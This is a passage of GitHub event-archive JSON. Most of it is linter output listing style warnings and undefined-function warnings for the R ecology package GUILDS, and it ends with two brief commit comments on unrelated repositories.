^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L39) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  sad <- prestonsort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L60) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gx <- prestonsort(meanx)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L61) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gy <- prestonsort(meany)\n        ^~~~~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L88) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gx <- prestonsort(meanx)\n        ^~~~~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L89) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gy <- prestonsort(meany)\n        ^~~~~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:28:3:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L28) *warning:* **local variable ‘SADX’ assigned but may not be used**\n```r\n​  SADX <- c()\n  ^~~~\n```\n[R/generateData.R:29:3:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L29) *warning:* **local variable ‘SADY’ assigned but may not be used**\n```r\n​  SADY <- c()\n  ^~~~\n```\n[R/generateData.R:36:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:36:66:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:37:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:18:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                 ^\n```\n[R/generateData.R:42:28:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/generateData.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n             ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:44:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                           ^~~~\n```\n[R/generateData.R:49:49:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                                ^\n```\n[R/generateData.R:55:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sadx <- generate.ZSM(theta, I_X, NX)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sady <- generate.ZSM(theta, I_Y, NY)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = sadx, guildY = sady)\n                ^\n```\n[R/generateData.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:64:38:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                     ^\n```\n[R/generateData.R:64:46:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                             ^\n```\n[R/generateData.R:64:48:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                               ^\n```\n[R/generateData.R:66:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  b <- lgamma(theta_x + theta_y + J) - \n                                      ^\n```\n[R/generateData.R:68:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:71:32:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                              ~^~\n```\n"}},"created_at":"2016-09-22T18:10:50Z"}
{"id":"4604145867","type":"CommitCommentEvent","actor":{"login":"agx"},"repo":{"name":"Nosmoht/ansible-module-foreman"},"payload":{"comment":{"id":19134648,"position":5,"line":null,"path":"foreman_subnet.py","commit_id":"9ce8440d5c606c358b0f5e8ef68134a4cdf07712","created_at":"2016-09-22T18:11:07Z","updated_at":"2016-09-22T18:11:07Z","body":"On Thu, Sep 22, 2016 at 10:47:55AM -0700, Thomas Krahn wrote:\n> Could you please add the default value to the Ansible module docu?\n\nFixed.\n"}},"created_at":"2016-09-22T18:11:07Z"}
{"id":"4604158728","type":"CommitCommentEvent","actor":{"login":"psundar"},"repo":{"name":"psundar/GoogleAppEngine_pjt"},"payload":{"comment":{"id":19134675,"position":null,"line":null,"path":null,"commit_id":"fd4a45785840c7814c66ec2da3f6f1e8d4bdcddd","created_at":"2016-09-22T18:13:25Z","updated_at":"2016-09-22T18:13:25Z","body":"Course Management Back End API using Google Cloud Endpoints and ProtoRPC"}},"created_at":"2016-09-22T18:13:25Z"}
